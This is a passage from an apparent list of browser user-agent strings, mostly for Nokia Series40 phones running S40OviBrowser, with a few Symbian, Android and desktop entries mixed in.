Nokia308/08.13; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; NokiaX3-02/le6.32; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/2.0.2.62.10", "Mozilla/5.0 (Series40; Nokia210/06.09; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.5.0.0.27", "Mozilla/5.0 (Series40; Nokia206/03.59; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.5.0.0.27", "Mozilla/5.0 (Series40; Nokia208/03.39; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; Nokia206/04.51; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.5.0.0.27", "Mozilla/5.0 (Series40; Nokia200/11.95; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.5.0.0.27", "Mozilla/5.0 (Series40; Nokia311/05.92; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.5.0.0.27", "Mozilla/5.0 (Series40; NokiaC2-06/07.63; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.5.0.0.27", "Mozilla/5.0 (Series40; Nokia302/14.78; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.5.0.0.27", "Mozilla/5.0 (Series40; NokiaC2-03/07.65; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/3.9.0.0.22", "Mozilla/5.0 (Series40; Nokia200/11.56; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.5.0.0.27", "Mozilla/5.0 (Series40; NokiaC2-03/07.48a; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; Nokia205/04.51; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; NokiaC2-00/03.99; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.5.0.0.27", "Mozilla/5.0 (Series40; Nokia202/20.28; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.5.0.0.27", "Mozilla/5.0 (Series40; Nokia309/08.22; 
Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; NokiaC2-06/07.29; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.5.0.0.27", "Mozilla/5.0 (Series40; Nokia5130c-2/07.97; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.5.0.0.27", "Mozilla/5.0 (Series40; Nokia112/03.32; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; NokiaC2-03/07.48; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/2.3.0.0.49", "Mozilla/5.0 (Series40; Nokia203/20.52; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.5.0.0.27", "Mozilla/5.0 (Series40; Nokia308/07.55; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; Nokia114/03.33; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.5.0.0.27", "Mozilla/5.0 (Series40; Nokia301.1/08.02; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; Nokia200/11.81; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/2.0.2.68.14", "Mozilla/5.0 (Series40; Nokia206/03.59; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/2.3.0.0.49", "Mozilla/5.0 (Series40; Nokia200/10.60; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.5.0.0.27", "Mozilla/5.0 (Series40; Nokia200/11.81; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.5.0.0.27", "Mozilla/5.0 (Series40; Nokia2051/03.20; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.5.0.0.27", "Mozilla/5.0 (Series40; Nokia206/03.58; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/2.2.0.0.36", "Mozilla/5.0 (Series40; Nokia2055/03.20; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.5.0.0.27", "Mozilla/5.0 (Series40; Nokia515.2/05.08; Profile/MIDP-2.1 
Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/2.3.0.0.55", "Mozilla/5.0 (Series40; NokiaX2-02/11.84; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.5.0.0.27", "Mozilla/5.0 (Series40; Nokia200/11.64; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.5.0.0.27", "Mozilla/5.0 (Series40; Nokia305/03.60; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/4.0.0.0.45", "Mozilla/5.0 (Series40; Nokia203/20.26; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; Nokia311/07.36; Profile/MIDP-1.2 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/4.0.0.0.45", "Mozilla/5.0 (Series40; Nokia306/07.42; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.5.0.0.27", "Mozilla/5.0 (Series40; Nokia305/05.92; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.5.0.0.27", "Mozilla/5.0 (Series40; Nokia114/03.47; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/2.3.0.0.48", "Mozilla/5.0 (Series40; Nokia305/07.42; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.5.0.0.27", "Mozilla/5.0 (Series40; Nokia210/06.09; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; Nokia210/04.12; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.5.0.0.27", "Mozilla/5.0 (Series40; Nokia206/04.52; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.5.0.0.27", "Mozilla/5.0 (Series40; Nokia206/03.59; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/4.0.0.0.45", "Mozilla/5.0 (Series40; Nokia305/03.60; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.5.0.0.27", "Mozilla/5.0 (Series40; Nokia302/14.26; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.5.0.0.27", "Mozilla/5.0 (Series40; NokiaC2-03/06.96; Profile/MIDP-2.1 Configuration/CLDC-1.1) 
Gecko/20100401 S40OviBrowser/2.3.0.0.49", "Mozilla/5.0 (Series40; Nokia206/03.58; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; Nokia206/03.59; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; Nokia2730c-1/10.47; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.5.0.0.27", "Mozilla/5.0 (Series40; Nokia305/03.60; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/3.9.0.0.22", "Mozilla/5.0 (Series40; Nokia112/03.48; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.5.0.0.27", "Mozilla/5.0 (Series40; Nokia203/20.26; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/2.3.0.0.49", "Mozilla/5.0 (Series40; NokiaC1-01/06.15; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.5.0.0.27", "Mozilla/5.0 (Series40; Nokia112/03.48; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; Nokia301/09.04; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.5.0.0.27", "Mozilla/5.0 (Series40; Nokia208.1/04.06; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.5.0.0.27", "Mozilla/5.0 (Series40; Nokia302/14.26; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; Nokia210/04.12; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/4.0.0.0.45", "Mozilla/5.0 (Series40; Nokia2730c-1/10.47; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/2.3.0.0.49", "Mozilla/5.0 (Series40; Nokia306/07.42; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; Nokia200/10.58; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.5.0.0.27", "Mozilla/5.0 (Series40; Nokia200/11.95; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 
S40OviBrowser/3.7.0.0.11", "Mozilla/5.0 (Series40; Nokia308/08.13; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/2.3.0.0.54", "Mozilla/5.0 (Series40; Nokia208/03.39; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.5.0.0.27", "Mozilla/5.0 (Series40; Nokia202/20.36; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.5.0.0.27", "Mozilla/5.0 (Series40; Nokia200/10.58; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/2.3.0.0.49", "Mozilla/5.0 (Series40; Nokia208/ddECL3G_13w22; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/2.3.0.0.55", "Mozilla/5.0 (Series40; Nokia205/03.18; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; Nokia200/11.56; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/2.0.2.68.14", "Mozilla/5.0 (Series40; NokiaC2-03/07.29; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; Nokia112/03.32; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.5.0.0.27", "Mozilla/5.0 (Series40; NokiaC2-03/07.65; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.5.0.0.27", "Mozilla/5.0 (Series40; Nokia114/03.51; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.5.0.0.27", "Mozilla/5.0 (Series40; Nokia200/12.04; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.5.0.0.27", "Mozilla/5.0 (Series40; NokiaX2-02/11.57; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.5.0.0.27", "Mozilla/5.0 (Series40; Nokia112/03.28; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.5.0.0.27", "Mozilla/5.0 (Series40; Nokia502/14.0.4/java_runtime_version=Nokia_Asha_1_2; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.5.0.0.20", "Mozilla/5.0 (Series40; Nokia311/05.92; Profile/MIDP-2.1 
Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/2.3.0.0.49", "Mozilla/5.0 (Series40; Nokia305/05.92; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/3.1.0.0.62", "Mozilla/5.0 (Series40; Nokia200/10.61; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; NokiaX3-02/le6.32; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/1.0.0.11.8", "Mozilla/5.0 (Series40; Nokia112/03.51; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.5.0.0.27", "Mozilla/5.0 (Series40; Nokia200/11.95; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/3.9.0.0.22", "Mozilla/5.0 (Series40; Nokia302/14.92; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.5.0.0.27", "Mozilla/5.0 (Series40; NokiaX2-02/11.79; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.5.0.0.27", "Mozilla/5.0 (Series40; Nokia203/20.36; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.5.0.0.27", "Mozilla/5.0 (Series40; NokiaX2-02/11.79; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/3.9.0.0.22", "Mozilla/5.0 (Series40; Nokia502/14.0.5/java_runtime_version=Nokia_Asha_1_2; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.5.0.0.20", "Mozilla/5.0 (Series40; Nokia2055/03.20; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; NokiaX2-01/08.70; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/3.7.0.0.11", "Mozilla/5.0 (Series40; NokiaC2-03/06.96; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/3.9.0.0.22", "Mozilla/5.0 (Series40; Nokia311/03.81; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; Nokia306/07.42; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/4.0.0.0.45", "Mozilla/5.0 (Series40; Nokia301/02.33; 
Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.5.0.0.27", "Mozilla/5.0 (Series40; Nokia302/14.78; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/2.0.2.68.9", "Mozilla/5.0 (Series40; NokiaC2-03/07.63; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/3.7.0.0.11", "Mozilla/32.0.3 (Series40; Nokia305/07.42; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/4.0.0.0.45", "Mozilla/5.0 (Series40; Nokia200/11.56; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/3.9.0.0.22", "Mozilla/5.0 (Series40; Nokia302/14.53; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; Nokia203/20.36; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/2.0.1.62.6", "Mozilla/5.0 (Series40; Nokia308/05.80; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; Nokia202/20.52; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.5.0.0.27", "Mozilla/5.0 (Series40; Nokia515.2/05.08; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.5.0.0.27", "Mozilla/5.0 (Series40; Nokia210.2/06.09; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; NokiaX2-00/04.80; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/3.9.0.0.22", "Mozilla/5.0 (Series40; NokiaAsha230DualSIM/14.0.5/java_runtime_version=Nokia_Asha_1_2; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.5.0.0.20", "Mozilla/5.0 (Series40; NokiaC2-03/07.48; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.5.0.0.27", "Mozilla/5.0 (Series40; Nokia305/07.42; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/4.0.0.0.45", "Mozilla/5.0 (Series40; Nokia203/20.52; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/4.0.1.0.1", 
"Mozilla/5.0 (Series40; Nokia205/03.19; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.5.0.0.27", "Mozilla/5.0 (Series40; Nokia208.4/06.01; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; Nokia205/03.19; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/4.0.1.0.1", "Mozilla/5.0 (Series40; Nokia515.2/10.34; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/2.3.0.0.49", "Mozilla/5.0 (Series40; Nokia305/03.60; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/3.7.0.0.11", "Mozilla/5.0 (Series40; Nokia200/11.64; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/3.9.0.0.22", "Mozilla/5.0 (Series40; Nokia6300/07.30; Profile/MIDP-2.0 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/2.0.2.68.14", "Mozilla/5.0 (Series40; Nokia200/10.61; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/4.0.1.0.1", "Mozilla/5.0 (Series40; NokiaC1-01/06.15; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.5.0.0.27", "Mozilla/5.0 (Series40; Nokia205/04.51; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.5.0.0.27", "Mozilla/5.0 (Series40; Nokia205/03.19; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/2.2.0.0.34", "Mozilla/5.0 (Series40; Nokia200/11.81; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/4.0.0.0.45", "Mozilla/5.0 (Series40; Nokia6300/07.30; Profile/MIDP-2.0 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.5.0.0.27", "Mozilla/5.0 (Series40; Nokia208/03.39; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/2.3.0.0.55", "Mozilla/5.0 (Series40; Nokia200/11.64; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/2.2.0.0.36", "Mozilla/5.0 (Series40; Nokia201/11.81; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/4.0.0.0.45", "Mozilla/5.0 (Series40; 
Nokia205/03.18; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/2.2.0.0.34", "Mozilla/5.0 (Series40; Nokia208/09.05; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.5.0.0.27", "Mozilla/5.0 (Series40; NokiaX2-02/10.90; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/1.0.2.26.11", "Mozilla/5.0 (Series40; Nokia205.1/04.51; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.5.0.0.27", "Mozilla/5.0 (Series40; Nokia200/11.95; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/2.0.1.62.6", "Mozilla/5.0 (Series40; NokiaX2-02/12.04; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; NokiaX2-02/11.84; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/2.0.1.62.6", "Mozilla/5.0 (Series40; Nokia208/10.34; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.5.0.0.27", "Mozilla/5.0 (Series40; Nokia2700c-2/07.80; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/4.0.0.0.45", "Mozilla/5.0 (Series40; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/3.7", "Mozilla/5.0 (SymbianOS/9.4; Series60/5.0 NokiaC5-03/23.0.015; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/533.4 (KHTML, like Gecko) NokiaBrowser/7.3.1.33 Mobile Safari/533.4", "Mozilla/5.0 (Series40; Nokia301.1/08.02; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.5.0.0.27", "Mozilla/5.0 (Series40; Nokia200/11.64; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/2.0.2.68.14", "Mozilla/5.0 (Series40; Nokia206/04.52; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; NokiaX2-02/11.84; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/2.0.2.68.14", "Mozilla/5.0 (Series40; Nokia200/12.04; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 
S40OviBrowser/2.2.0.0.36", "Mozilla/5.0 (Series40; Nokia200/11.81; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/2.3.0.0.48", "Mozilla/5.0 (Series40; NokiaC2-03/06.96; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/3.7.0.0.11", "Mozilla/5.0 (Series40; Nokia200/11.81; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/2.2.0.0.36", "Mozilla/5.0 (Series40; Nokia2055/03.20; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/2.2.0.0.34", "Mozilla/5.0 (Series40; Nokia305/07.35; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/2.3.0.0.54", "Mozilla/5.0 (SymbianOS/9.3; Series60/3.2 NokiaE72-1/091.004; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/533.4 (KHTML, like Gecko) NokiaBrowser/7.3.1.34 Mobile Safari/533.4", "Mozilla/5.0 (Series40; Nokia200/11.56; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/2.0.1.62.6", "Mozilla/5.0 (Series40; Nokia207.1/10.24; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/2.3.0.0.55", "Mozilla/5.0 (Series40; Nokia200/11.81; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/2.2.0.0.36", "Mozilla/5.0 (Series40; Nokia200/12.04; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/4.0.0.0.45", "Mozilla/5.0 (Series40; Nokia110/03.47; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/3.9.0.0.22", "Mozilla/5.0 (Series40; Nokia2052/03.20; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/2.2.0.0.34", "Mozilla/5.0 (Series40; Nokia307/07.55; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/2.2.0.0.36", "Mozilla/5.0 (Series40; NokiaX3-02/10.90; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/1.0.2.26.11", "Mozilla/5.0 (Series40; Nokia200/10.60; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/3.9.0.0.22", "Mozilla/5.0 (Linux; Android 4.1.2; GT-P3110; 
Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/535.1 (KHTML, like Gecko) NokiaBrowser/8.3.1.4 Mobile Safari/535.1", "Mozilla/5.0 (Series40; Nokia200/11.56; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/4.0.0.0.45", "Mozilla/5.0 (Series40; Nokia208.4/04.06; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; Nokia305/07.42; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/4.0.0.0.45. browser: Nokia Browser OS40", "Mozilla/5.0 (Series40; Nokia305/07.42; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; NokiaC3-01/07.53; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; NokiaX2-02/11.84; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/2.0.2.68.14", "Mozilla/5.0 (series40; NokiaX2-02/10.90;Profile/MIDP-2.1 configuration/CLD-1.1) gecko/20100401 S40OviBrowser/1.0.2.26.11", "Mozilla/5.0 (Series40; Nokia200/11.95; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/4.0.1.0.1", "Mozilla/5.0 (Series40; Nokia200/10.60; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/1.0.2.26.11", "Mozilla/5.0 (Symbian/3; Android 2.3.5; Nokia808PureView/113.010.1508; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/535.1 (KHTML, like Gecko) NokiaBrowser/8.3.2.21 Mobile Safari/535.1", "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Mozilla/5.0 (Series40; Nokia200/11.81; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/3.9.0.0.22", "Mozilla/5.0 (Series40; Nokia200/10.60; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/2.3.0.0.49", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36 Mozilla/5.0 (Series30Plus; Nokia225/20.10.11; 
Profile/Series30Plus Configuration/Series30Plus) Gecko/20100401 S40OviBrowser/3.8.1.2.06", "Mozilla/5.0 (SymbianOS/9.4; Series60/5.0 Nokia5800d-1/60.0.003; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/533.4 (KHTML, like Gecko) NokiaBrowser/7.3.1.33 Mobile Safari/533.4", "Mozilla/5.0 (Series40; Nokia305/07.35; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/2.3.0.0.54", "Mozilla/5.0 (Series40; Nokia200/11.95; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/3.2.0.0.6", "Mozilla/5.0 (Series40; Nokia515/07.01; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.5.0.0.27", "Mozilla/5.0 AppleWebKit/533.4 (KHTML, like Gecko) NokiaBrowser/7.3.1.33 Mobile Safari/533.4", 